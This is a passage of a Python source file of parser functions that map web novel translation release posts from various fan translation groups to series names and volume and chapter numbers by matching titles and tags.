        return buildReleaseMessage(item, "Tiger Story", vol, chp, tl_type='oel')
    elif 'otoburi' in item['tags'] or 'Otoburi' in item['tags']:
        # Arrrgh, the volume/chapter structure for this series is a disaster!
        # I resent having to do this....
        # Maps the arc/chapter name in the title to a synthetic volume number.
        volume_lut = {
            # Child Chapter
            "3 years old"                   : 1,
            "5 years old"                   : 1,
            "6 years old"                   : 1,
            "7 years old"                   : 1,
            "12 years old"                  : 1,
            "14 years old"                  : 1,
            "15 years old"                  : 1,
            "16 years old"                  : 1,
            # Academy Chapter (First Year First Semester)
            "School Entrance Ceremony"      : 2,
            "First Year First Semester"     : 2,
            "1st Year 1st Semester"         : 2,
            # Academy Chapter (Summer Vacation)
            "Summer Vacation"               : 3,
            "Summer Vacation 2nd Half"      : 3,
            "Summer Vacation Last"          : 3,
            # Academy Chapter (First Year Second Semester)
            "First Year Second Semester"    : 4,
            # Job Chapter
            "Recuperating?"                 : 5,
            "Wedding Preparations?"         : 5,
            "Newlywed Life"                 : 5,
            # Major Cleanup Chapter
            "Cleanup"                       : 6,
            "My Lord’s Engagement"          : 6,
            "The Winter is Almost Here"     : 6,
            "Experiments and Preparations"  : 6,
            "Engagement Party"              : 6,
            # Dilemma Chapter
            "In the Middle of a Fight?"     : 7,
            "In the Middle of Reflecting"   : 7,
        }
        for chp_key in volume_lut.keys():
            if chp_key.lower() in item['title'].lower():
                return buildReleaseMessage(item, 'Otome Game no Burikko Akuyaku Onna wa Mahou Otaku ni Natta', volume_lut[chp_key], chp)
    # else:
    # 	# self.log.warning("Cannot decode item:")
    # 	# self.log.warning("%s", item['title'])
    # 	# self.log.warning("Cannot decode item: '%s'", item['title'])
    return False
####################################################################################################################################################
def extractTheLazy9(item):
    '''
    Parser for releases from the TheLazy9 translation group.
    '''
    title = item['title']
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
    if "preview" in title.lower() or not (chp or vol):
        return False
    # Ordered (predicate, series-name) rules; the first match wins.
    rules = [
        (lambda: 'かんすとっぷ!(KANSUTOPPU)' in item['tags'] or "Kansutoppu!" in title,
            "Kansutoppu!"),
        (lambda: title.startswith("Manowa"),
            "Manowa Mamono Taosu Nouryoku Ubau Watashi Tsuyokunaru"),
        (lambda: title.startswith("Cat "),
            "Me and My Beloved Cat (Girlfriend)"),
        (lambda: 'Goblin Tenseiki ~erufu youjo ni kaku de maketeru yuusha na ore~' in item['tags'],
            'Goblin Tenseiki ~erufu youjo ni kaku de maketeru yuusha na ore~'),
        (lambda: "Black Knight" in title,
            "The Black Knight Who Was Stronger than even the Hero"),
        (lambda: "Astarte’s Knight" in title,
            "Astarte's Knight"),
        (lambda: "HTG:" in title,
            "Tozoku shoujo ni tensei shita ore no shimei wa yuusha to maou ni iyagarasena no!"),
    ]
    for matches, series in rules:
        if matches():
            return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
    return False
####################################################################################################################################################
def extractPikaTranslations(item):
    '''
    Parser for releases from Pika Translations.
    '''
    title = item['title']
    chp, vol = extractChapterVol(title)
    if "preview" in title.lower() or not (chp or vol):
        return False
    is_ccm = ('Close Combat Mage' in item['tags']
              or 'CCM Chapter' in title
              or 'Close Combat Mage Chapter' in title)
    if is_ccm:
        return buildReleaseMessage(item, 'Close Combat Mage', vol, chp)
    is_ior = ('IoR Book' in title
              or 'IoR B' in title
              or 'Inch of Radiance Book' in title
              or 'Inch of Radiance Chapter' in title)
    if is_ior:
        return buildReleaseMessage(item, 'Inch of Radiance', vol, chp)
    if 'World of Immortals Chapter' in title:
        return buildReleaseMessage(item, 'World of Immortals', vol, chp)
    if 'Perfect World Chapter' in title or 'PW Chapter' in title:
        return buildReleaseMessage(item, 'Perfect World', vol, chp)
    return False
####################################################################################################################################################
def extractShinTranslations(item):
    '''
    Parser for releases from Shin Translations (The New Gate).
    '''
    chp, vol, frag = extractChapterVolFragment(item['title'])
    tags = item['tags']
    # Status-update posts share the series tag but are not releases.
    is_release = 'THE NEW GATE' in tags and 'Status Update' not in tags
    if is_release and chp and vol and frag:
        return buildReleaseMessage(item, 'The New Gate', vol, chp, frag=frag)
    return False
####################################################################################################################################################
def extractScryaTranslations(item):
    '''
    Parser for releases from Scrya Translations.
    '''
    chp, vol, frag = extractChapterVolFragment(item['title'])
    # Tag -> series name (identical here, kept explicit for clarity).
    tag_to_series = (
        ("So What if It's an RPG World!?", "So What if It's an RPG World!?"),
        ('My Disciple Died Yet Again',     'My Disciple Died Yet Again'),
    )
    for tag, series in tag_to_series:
        if tag in item['tags']:
            return buildReleaseMessage(item, series, vol, chp, frag=frag)
    return False
####################################################################################################################################################
def extractSkythewood(item):
    '''
    # Skythewood translations

    Multi-series parser; tag checks first, then title-prefix checks.
    '''
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or "preview" in item['title'].lower():
        return False
    if 'Altina the Sword Princess' in item['tags']:
        return buildReleaseMessage(item, 'Haken no Kouki Altina', vol, chp, frag=frag)
    if 'Overlord' in item['tags']:
        # Lots of idiot-checking here, because there are a
        # bunch of annoying edge-cases I want to work around.
        # This will PROBABLY BREAK IN THE FUTURE!
        if "Drama CD" in item['title'] or \
                "Track" in item['title'] or \
                not "Volume" in item['title']:
            # NOTE(review): every sibling parser returns False here, not
            # None — both are falsy, so callers behave the same, but this
            # is inconsistent.
            return None
        return buildReleaseMessage(item, 'Overlord', vol, chp, frag=frag, postfix=postfix)
    if 'Gifting the wonderful world' in item['tags']:
        return buildReleaseMessage(item, 'Gifting the Wonderful World with Blessings!', vol, chp, frag=frag)
    if "Knight's & Magic" in item['tags']:
        return buildReleaseMessage(item, 'Knight\'s & Magic', vol, chp, frag=frag)
    if "Gate" in item['tags']:
        return buildReleaseMessage(item, 'Gate - Thus the JSDF Fought There!', vol, chp, frag=frag)
    if 'Genocide Reality' in item['tags']:
        return buildReleaseMessage(item, 'Genocide Reality', vol, chp, frag=frag)
    if 'Youjo Senki' in item['tags']:
        return buildReleaseMessage(item, 'Youjo Senki', vol, chp, frag=frag)
    if 'Gifting' in item['tags']:
        return buildReleaseMessage(item, 'Gifting the wonderful world with blessings!', vol, chp, frag=frag)
    if 'Manu' in item['tags']:
        return buildReleaseMessage(item, 'Manuscript Screening Boy and Manuscript Submitting Girl', vol, chp, frag=frag)
    if 'Isekai Mahou' in item['tags']:
        return buildReleaseMessage(item, 'Isekai Mahou wa Okureteru!', vol, chp, frag=frag)
    # Title-prefix fallbacks for posts without useful tags.
    if item['title'].startswith('A Tale of Two Shadows') or item['title'].startswith("The Legend of Faro: A Tale of Two Shadows Chapter"):
        return buildReleaseMessage(item, 'A Tale of Two Shadows', vol, chp, frag=frag)
    if item['title'].startswith('Overlord'):
        return buildReleaseMessage(item, 'Overlord', vol, chp, frag=frag)
    if item['title'].startswith('Hyperion 7'):
        return buildReleaseMessage(item, 'Hyperion 7', vol, chp, frag=frag)
    if item['title'].startswith('I Want A Harem But She Is Very...'):
        return buildReleaseMessage(item, 'I Want A Harem But She Is Very…', vol, chp, frag=frag)
    if item['title'].startswith('Gate of Twilight'):
        return buildReleaseMessage(item, 'Gate of Twilight', vol, chp, frag=frag)
    return False
####################################################################################################################################################
def extractThatGuyOverThere(item):
    '''
    # That Guy Over There

    Parser for 'Wu Shen Kong Jian' and 'Le Festin de Vampire' releases.
    '''
    chp, vol, frag = extractChapterVolFragment(item['title'])
    if not (chp or vol) or "preview" in item['title'].lower():
        return False
    if 'wushenkongjian' in item['tags']:
        return buildReleaseMessage(item, 'Wu Shen Kong Jian', vol, chp, frag=frag)
    match = re.search(r'^Le Festin de Vampire – Chapter (\d+)\-(\d+)', item['title'])
    if match:
        # CONSISTENCY FIX: convert captures to int, matching the sibling
        # parsers (e.g. extractSousetsuka) instead of passing raw strings.
        chp = int(match.group(1))
        frag = int(match.group(2))
        return buildReleaseMessage(item, 'Le Festin de Vampire', vol, chp, frag=frag)
    return False
####################################################################################################################################################
def extractOtterspaceTranslation(item):
    '''
    Parser for releases from Otterspace Translation.
    '''
    title = item['title']
    chp, vol, frag = extractChapterVolFragment(title)
    if "preview" in title.lower() or not (chp or vol):
        return False
    # Resolve the series from title (and, for one series, tags), then emit
    # a single release message at the end.
    if 'Elqueeness' in title:
        series = 'Spirit King Elqueeness'
    elif '[Dark Mage]' in title or '[DarkMage]' in title:
        series = 'Dark Mage'
    elif 'Dragon Maken War' in title:
        series = 'Dragon Maken War'
    elif 'Legend of Legend' in title:
        series = 'Legend of Legend'
    elif "Seoul Station's Necromancer" in title or "Seoul Station's Necromancer" in item['tags']:
        series = "Seoul Station's Necromancer"
    else:
        return False
    return buildReleaseMessage(item, series, vol, chp, frag=frag)
####################################################################################################################################################
def extractTrippTl(item):
    '''
    Parser for releases from Tripp Translations (Majin Tenseiki).
    '''
    chp, vol, frag = extractChapterVolFragment(item['title'])
    if "preview" in item['title'].lower() or not (chp or vol):
        return False
    if 'Majin Tenseiki' not in item['title']:
        return False
    return buildReleaseMessage(item, 'Majin Tenseiki', vol, chp, frag=frag)
def extractSaiakuTranslationsBlog(item):
    '''
    Parser for releases from the Saiaku Translations blog
    (Kenja no Deshi wo Nanoru Kenja).
    '''
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol or frag) or "preview" in item['title'].lower():
        # CONSISTENCY FIX: was ``return None``; every sibling parser in this
        # module returns False on the no-match path (both are falsy).
        return False
    if item['title'].startswith('She Professed Herself The Pupil Of The Wiseman'):
        return buildReleaseMessage(item, 'Kenja no Deshi wo Nanoru Kenja', vol, chp, frag=frag, postfix=postfix)
    return False
####################################################################################################################################################
def extractRaisingTheDead(item):
	'''
	# extractRaisingTheDead
	Map a Raising The Dead feed item to one of the many series hosted
	there, matching mostly on tags and occasionally on title phrases.
	The checks are order-dependent: an item carrying several known tags
	resolves to the first matching series. Returns a release message,
	or False for previews / items with no chapter or volume position.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	if 'Isekai meikyuu de dorei harem wo' in item['tags'] \
		or 'Slave harem in the labyrinth of the other world' in item['tags'] \
		or item['title'].startswith("slave harem"):
		return buildReleaseMessage(item, 'Isekai Meikyuu De Dorei Harem wo', vol, chp, frag=frag)
	if 'Shinka no Mi' in item['tags'] or 'Shinka' in item['title']:
		return buildReleaseMessage(item, 'Shinka no Mi', vol, chp, frag=frag)
	if 'Kumo desu ga' in item['tags']:
		return buildReleaseMessage(item, 'Kumo Desu Ga, Nani Ka?', vol, chp, frag=frag)
	if 'Din No Monshou' in item['tags']:
		return buildReleaseMessage(item, 'Din No Monshou', vol, chp, frag=frag)
	if 'Elf Tensei' in item['tags']:
		return buildReleaseMessage(item, 'Elf Tensei Kara no Cheat Kenkoku-ki', vol, chp, frag=frag)
	if 'Smartphone' in item['tags'] or 'Smartphone Chapter' in item['title']:
		return buildReleaseMessage(item, 'Isekai wa Smartphone to Tomoni', vol, chp, frag=frag)
	# Title spelling varies between posts ("Tran" / "Trans"), hence the
	# multiple variants here.
	if 'Tran Sexual Online' in item['tags'] or \
		'Tran Sexual Online' in item['title'] or \
		'Trans Sexual Online' in item['title']:
		return buildReleaseMessage(item, 'Tran Sexual Online', vol, chp, frag=frag)
	if 'Master Of Monsters' in item['title'] or 'Master of Monsters' in item['tags']:
		return buildReleaseMessage(item, 'Master Of Monsters', vol, chp, frag=frag)
	if 'Takami no Kago' in item['tags'] or 'Takami no Kago' in item['title']:
		return buildReleaseMessage(item, 'Takami No Kago', vol, chp, frag=frag)
	if 'Alice Tales' in item['tags']:
		return buildReleaseMessage(item, 'Alice Tale in Phantasmagoria', vol, chp, frag=frag)
	if 'Katte Kita Motoyuusha' in item['tags']:
		return buildReleaseMessage(item, 'Katte Kita Motoyuusha', vol, chp, frag=frag)
	if 'Riot Grasper' in item['tags']:
		return buildReleaseMessage(item, 'Riot Grasper', vol, chp, frag=frag)
	if 'E? Heibon Desu Yo??' in item['tags'] \
		or 'Eh? Heibon desu yo??' in item['tags']:
		return buildReleaseMessage(item, 'E? Heibon Desu Yo??', vol, chp, frag=frag)
	if 'Right Grasper' in item['tags']:
		return buildReleaseMessage(item, 'Right Grasper ~Stealing Skills in the Other World~', vol, chp, frag=frag)
	if 'I, with house work and cooking, takes away the backbone of the Demon lord! The peerless house-husband starts from kidnapping!' in item['tags'] \
		or "Demon Lord's Pet" in item['tags']:
		return buildReleaseMessage(item, 'I, with house work and cooking, takes away the backbone of the Demon lord! The peerless house-husband starts from kidnapping!', vol, chp, frag=frag)
	if 'Game nai ni haitte Doragon o hanto' in item['tags'] \
		or item['title'].startswith('(R18) Frequenting Brothels'):
		return buildReleaseMessage(item, 'Game nai ni haitte Dragon o Hanto Shinagara Shokan ni Kayoi Tsumeru Hanashi.', vol, chp, frag=frag)
	if 'Yuusha Ga Onna Da to Dame Desu Ka?' in item['tags']:
		return buildReleaseMessage(item, 'Yuusha Ga Onna Da to Dame Desu Ka?', vol, chp, frag=frag)
	if 'Invincible Magician' in item['tags']:
		return buildReleaseMessage(item, 'Invincible Magician ~ Akashic Record Overwrite~', vol, chp, frag=frag)
	if 'I Said Make My Abilities Average!' in item['tags'] or 'Average Abilities' in item['tags']:
		return buildReleaseMessage(item, 'I Said Make My Abilities Average!', vol, chp, frag=frag)
	if 'Science Shall Prevail over Magic' in item['tags']:
		return buildReleaseMessage(item, 'Science shall Prevail over Magic', vol, chp, frag=frag)
	if 'Is Heaven Supposed To Be Like This?!' in item['tags']:
		return buildReleaseMessage(item, "Is Heaven Supposed to Be Like This?!", vol, chp, frag=frag, tl_type='oel')
	if 'KmF?!' in item['tags']:
		# Titles of the form "... fantasy!? <vol>-<chp>"; when that pattern
		# is present it overrides whatever the generic parser extracted.
		matches = re.search(r'When I returned home, what I found was fantasy!\? (\d+)\-(\d+)', item['title'], flags=re.IGNORECASE)
		if matches:
			vol = float(matches.group(1))
			chp = float(matches.group(2))
		return buildReleaseMessage(item, 'Kaettekite mo Fantasy!?', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractTensaiTranslations(item):
	'''
	# Tensai Translations
	Match a Tensai Translations item against its two known series tags.
	Returns a release message or False.
	'''
	chp, vol, frag = extractChapterVolFragment(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	known_series = ('Spirit Migration', 'Tsuyokute New Saga')
	for series in known_series:
		if series in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag)
	return False
####################################################################################################################################################
def extractThunder(item):
	'''
	# Thunder Translations:
	Only 'Stellar Transformations' is handled by this group.
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	have_position = bool(vol or chp)
	if not have_position or "preview" in title.lower():
		return False
	if 'Stellar Transformations' in item['tags'] and have_position:
		return buildReleaseMessage(item, 'Stellar Transformations', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractTuShuGuan(item):
	'''
	# 中翻英圖書館 Translations
	Handles 'The Crane Startles Kunlun' (tagged 'He Jing Kunlun').
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if not (chp or vol):
		return False
	if "preview" in title.lower():
		return False
	if 'He Jing Kunlun' in item['tags'] and (vol or chp or postfix):
		return buildReleaseMessage(item, 'The Crane Startles Kunlun', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractSwordAndGame(item):
	'''
	# Sword And Game
	Handles 'The Rise of the Shield Hero' (tag-gated on a 'chapter' tag)
	and 'Ark'. Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (chp or vol):
		return False
	lowered_tags = [tag.lower() for tag in item['tags']]
	if 'The Rising of the Shield Hero' in item['tags'] and 'chapter' in lowered_tags:
		return buildReleaseMessage(item, 'The Rise of the Shield Hero', vol, chp, frag=frag, postfix=postfix)
	if 'Ark' in item['tags'] and (vol or chp or postfix):
		return buildReleaseMessage(item, 'Ark', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractOhanashimi(item):
	'''
	# Ohanashimi
	Resolve Ohanashimi items by tag. Any text after the first colon in
	the title is taken as the chapter-name postfix.
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (chp or vol):
		return False
	if ":" in title:
		_, _, postfix = title.partition(":")
	tags = item['tags']
	if 'Seijo no Kaifuku Mahou' in tags:
		return buildReleaseMessage(item, 'Seijo no Kaifuku Mahou ga Dou Mitemo Ore no Rekkaban na Ken ni Tsuite', vol, chp, frag=frag, postfix=postfix)
	if 'Tate no Yuusha' in tags:
		return buildReleaseMessage(item, 'The Rise of the Shield Hero', vol, chp, frag=frag, postfix=postfix)
	if 'No Fatigue' in tags or title.lower().startswith("nf: "):
		return buildReleaseMessage(item, 'NO FATIGUE ~24 Jikan Tatakaeru Otoko no Tenseitan~', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractOmegaHarem(item):
	'''
	# Omega Harem Translations
	Map a feed item to one of the many series Omega Harem hosts, matching
	on title phrases (and, for the GunOta rehost, tags).
	Returns a release message, or False for previews / unmatched items.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol):
		return False
	# BUG FIX: previously this matched "preview" against the raw title,
	# unlike every other extractor in this file, so "Preview"/"PREVIEW"
	# posts slipped through. Compare against the lower-cased title.
	if "preview" in item['title'].lower():
		return False
	title = item['title']
	if 'Destruction Flag Noble Girl Villainess' in title or 'Destruction Flag Otome' in title:
		return buildReleaseMessage(item, 'Destruction Flag Otome', vol, chp, frag=frag, postfix=postfix)
	if 'Demon King Reincarnation' in title:
		return buildReleaseMessage(item, 'I, the Demon King, have become a noble girl villainess? Hah, what a joke.', vol, chp, frag=frag, postfix=postfix)
	if 'Slave Girl –' in title:
		return buildReleaseMessage(item, 'Demotion Trip ~The Magic Girl Swordsman from the Hero’s Party Stumbled into Another World and Became a Slave', vol, chp, frag=frag, postfix=postfix)
	if 'Flight of the Dragon, Dance of the Phoenix' in title:
		return buildReleaseMessage(item, 'Dragon Flies Phoenix Dances', vol, chp, frag=frag, postfix=postfix)
	elif 'Dragon Life' in title:
		return buildReleaseMessage(item, 'Dragon Life', vol, chp, frag=frag, postfix=postfix)
	elif 'World Teacher' in title:
		return buildReleaseMessage(item, 'World Teacher - Isekaishiki Kyouiku Agent', vol, chp, frag=frag, postfix=postfix)
	elif 'jashin sidestory' in title.lower() or 'Jashin Average Side Story' in title:
		return buildReleaseMessage(item, 'Evil God Average – Side Story', vol, chp, frag=frag, postfix=postfix)
	elif 'Heibon' in title:
		return buildReleaseMessage(item, 'E? Heibon Desu yo??', vol, chp, frag=frag, postfix=postfix)
	elif 'eliza chapter' in title.lower():
		# Eliza posts put the chapter name after an en-dash.
		if "–" in title and not postfix:
			postfix = title.split("–")[-1]
		return buildReleaseMessage(item, 'I Reincarnated as a Noble Girl Villainess, but why did it turn out this way', vol, chp, frag=frag, postfix=postfix)
	elif 'Villainess Brother Reincarnation' in title:
		return buildReleaseMessage(item, 'Villainess Brother Reincarnation', vol, chp, frag=frag, postfix=postfix)
	elif 'The Black Knight' in title:
		return buildReleaseMessage(item, 'The Black Knight Who Was Stronger than Even the Hero', vol, chp, frag=frag, postfix=postfix)
	elif 'GunOta' in item['tags'] and 're-Translations rehost' in item['tags']:
		# Rehosted content: credit the originating group.
		item['srcname'] = "Re:Translations"
		return buildReleaseMessage(item, 'Gun-Ota ga Mahou Sekai ni Tensei Shitara, Gendai Heiki de Guntai Harem wo Tsukucchaimashita!?', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractPuttty(item):
	'''
	# putttytranslations
	Resolve putttytranslations items by tag (or, for 'Beseech the Devil',
	by title). Returns a release message or False.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	# Tag capitalization on the site is inconsistent, so compare
	# case-insensitively. Idiom fix: generator expression inside any()
	# instead of building a throwaway list.
	if any(val.lower() == 'god of thunder' for val in item['tags']) and (vol or chp):
		if ":" in item['title']:
			# Chapter name follows the first colon.
			postfix = item['title'].split(":", 1)[-1]
		return buildReleaseMessage(item, 'God of Thunder', vol, chp, frag=frag, postfix=postfix)
	# (constant-folded the pointless '...'.lower() on the literal)
	if 'beseech the devil' in item['title'].lower():
		return buildReleaseMessage(item, 'Beseech the Devil', vol, chp, frag=frag, postfix=postfix)
	if 'Goblin' in item['tags']:
		return buildReleaseMessage(item, 'Goblin', vol, chp, frag=frag, postfix=postfix)
	if 'King of the Eternal Night' in item['tags']:
		return buildReleaseMessage(item, 'King of the Eternal Night', vol, chp, frag=frag, postfix=postfix)
	if 'Martial World' in item['tags']:
		return buildReleaseMessage(item, 'Martial World', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractRisingDragons(item):
	'''
	# Rising Dragons Translation
	Handles 'Shenmo Xitong' (tagged 'God and Devil World' + 'Release').
	Returns a release message or False.
	'''
	tags = item['tags']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if "preview" in item['title'].lower() or not (chp or vol):
		return False
	if 'God and Devil World' in tags and 'Release' in tags:
		return buildReleaseMessage(item, 'Shenmo Xitong', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractSylver(item):
	'''
	# Sylver Translations
	Resolve Sylver Translations items by tag; for every series, any text
	after the first colon in the title becomes the chapter-name postfix.
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if not (chp or vol) or "preview" in title.lower():
		return False
	def _colon_postfix():
		# Chapter name follows the first colon, when one is present.
		if ":" in title:
			return title.split(":", 1)[-1].strip()
		return postfix
	if "History's Number One Founder" in item['tags']:
		return buildReleaseMessage(item, "History's Number One Founder", vol, chp, frag=frag, postfix=_colon_postfix())
	if 'The Gate of Extinction' in item['tags']:
		return buildReleaseMessage(item, "The Gate of Extinction", vol, chp, frag=frag, postfix=_colon_postfix())
	if "Shura's Wrath" in item['tags'] or "Shura\"s Wrath" in item['tags']:
		return buildReleaseMessage(item, 'Shura\'s Wrath', vol, chp, frag=frag, postfix=_colon_postfix())
	return False
####################################################################################################################################################
def extractTomorolls(item):
	'''
	# Tomorolls
	Handles the 'Cicada as Dragon' series only.
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if "preview" in title.lower() or not (chp or vol):
		return False
	is_cicada = 'Cicada as Dragon' in item['tags'] or 'Semi Datte Tensei Sureba Ryuu Ni Naru' in title
	if is_cicada:
		return buildReleaseMessage(item, 'Cicada as Dragon', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractTotokk(item):
	'''
	# Totokk's Translations
	Handles 'Shen Yin Wang Zuo'. The site occasionally mis-spells its own
	abbreviation ([SWYZ]), so several title markers are accepted.
	Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if not (chp or vol) or "preview" in title.lower():
		return False
	markers = ('[SYWZ] Chapter', '[SWYZ] Chapter', '[SYWZ]', 'Shen Yin Wang Zuo, Chapter')
	if any(marker in title for marker in markers):
		return buildReleaseMessage(item, 'Shen Yin Wang Zuo', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractTranslationNations(item):
	'''
	# Translation Nations
	Resolve Translation Nations items via an ordered tag -> series table,
	with one extra title-based fallback for 'The Ultimate Evolution'.
	Returns a release message or False.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	tag_to_series = [
		('Stellar Transformation',  'Stellar Transformations'),
		('The Legendary Thief',     'Virtual World - The Legendary Thief'),
		('SwallowedStar',           'Swallowed Star'),
		('God and Devil World',     'God and Devil World'),
		('Limitless Sword God',     'Limitless Sword God'),
		('Undefeated God of War',   'Undefeated God of War'),
		('Path to Heaven',          'Path to Heaven'),
		('The Ultimate Evolution',  'The Ultimate Evolution'),
	]
	for tag, series in tag_to_series:
		if tag in item['tags']:
			return buildReleaseMessage(item, series, vol, chp, frag=frag, postfix=postfix)
	if item['title'].lower().startswith("the ultimate evolution volume") and "Chapter" in item['title']:
		return buildReleaseMessage(item, 'The Ultimate Evolution', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractTonyYonKa(item):
	'''
	# tony-yon-ka.blogspot.com (the blog title is stupidly long)
	Handles 'Manowa ...' and 'Kyuuketsu Hime ...'; both require a chapter
	number to be present. Returns a release message or False.
	'''
	title = item['title']
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
	if not (chp or vol) or "preview" in title.lower():
		return False
	if chp:
		if 'Manowa' in title:
			return buildReleaseMessage(item, 'Manowa Mamono Taosu Nouryoku Ubau Watashi Tsuyokunaru', vol, chp, frag=frag, postfix=postfix)
		if 'Vampire Princess' in title:
			return buildReleaseMessage(item, 'Kyuuketsu Hime wa Barairo no Yume o Miru', vol, chp, frag=frag, postfix=postfix)
	return False
####################################################################################################################################################
def extractRebirthOnlineWorld(item):
	'''
	Rebirth Online World.
	Large multi-series group: items are matched first by tag, then by
	title substring. The checks are order-dependent — the first match
	wins. Returns a release message, or False for previews / items with
	no chapter or volume position.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return False
	if 'Earth Core' in item['tags']:
		return buildReleaseMessage(item, 'Earth\'s Core', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'Jikuu Mahou TL' in item['tags']:
		return buildReleaseMessage(item, 'Jikuu Mahou de Isekai to Chikyuu wo Ittarikitari', vol, chp, frag=frag, postfix=postfix)
	if 'Isekai Shoukan' in item['tags']:
		return buildReleaseMessage(item, 'Isekai Shoukan Makikomu Ijousha', vol, chp, frag=frag, postfix=postfix)
	if 'Magic Bullet' in item['tags']:
		return buildReleaseMessage(item, 'Magic Bullet in Magic Land', vol, chp, frag=frag, postfix=postfix)
	if 'Monster Musume' in item['tags']:
		return buildReleaseMessage(item, 'Monster Musume Harem o Tsukurou!', vol, chp, frag=frag, postfix=postfix)
	# NOTE(review): this condition duplicates the one directly above, so the
	# 'Parameter Remote Controller' branch is unreachable. The intended tag
	# was probably something else (a 'PRC' check exists further down) —
	# confirm before changing.
	if 'Monster Musume' in item['tags']:
		return buildReleaseMessage(item, 'Parameter Remote Controller', vol, chp, frag=frag, postfix=postfix)
	if 'goddess grant me a girlfriend' in item['tags']:
		return buildReleaseMessage(item, 'Goddess Grant me a Girlfriend', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'Loiterous' in item['tags']:
		return buildReleaseMessage(item, 'Loiterous', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if "tdadp" in item['title'].lower() or 'To deprive a deprived person episode'.lower() in item['title'].lower():
		# Episode numbers for this series sometimes parse as a volume;
		# discard the volume when both were extracted.
		if vol and chp:
			vol = None
		return buildReleaseMessage(item, 'To Deprive a Deprived Person', vol, chp, frag=frag, postfix=postfix)
	if "Lazy Dragon".lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Taidana Doragon wa Hatarakimono', vol, chp, frag=frag, postfix=postfix)
	if 'Isekai Ryouridou'.lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Isekai Ryouridou', vol, chp, frag=frag, postfix=postfix)
	if "Neta Chara".lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Neta Chara', vol, chp, frag=frag, postfix=postfix)
	if "Destination of Crybird".lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Destination of Crybird', vol, chp, frag=frag, postfix=postfix)
	if "Immortal God Emperor".lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Immortal God Emperor', vol, chp, frag=frag, postfix=postfix)
	if "Zombie master".lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Zombie Master', vol, chp, frag=frag, postfix=postfix)
	if "Werewolf chapter".lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Werewolf chapter', vol, chp, frag=frag, postfix=postfix)
	if "Sefiria chap".lower() in item['title'].lower() \
		or "Sefi chap".lower() in item['title'].lower() :
		return buildReleaseMessage(item, 'Sefiria', vol, chp, frag=frag, postfix=postfix)
	# NOTE(review): 'TMaster of Dungeon' looks like a typo for
	# 'Master of Dungeon'. This string keys the series lookup downstream,
	# so confirm how it is registered before fixing.
	if 'Master of Dungeon'.lower() in item['title'].lower():
		return buildReleaseMessage(item, 'TMaster of Dungeon', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'TRTS(The Rude Time Stopper)'.lower() in item['title'].lower():
		return buildReleaseMessage(item, 'The Rude Time Stopper', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'Polymath Redux '.lower() in item['title'].lower():
		return buildReleaseMessage(item, 'Polymath Redux', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'The Falcon Immortal'.lower() in item['title'].lower():
		return buildReleaseMessage(item, 'The Falcon Immortal', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if 'The Last Guild'.lower() in item['title'].lower():
		return buildReleaseMessage(item, 'The Last Guild: Remastered', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
	if '[Second Saga] Chapter'.lower() in item['title'].lower() or item['title'].startswith("[SS] "):
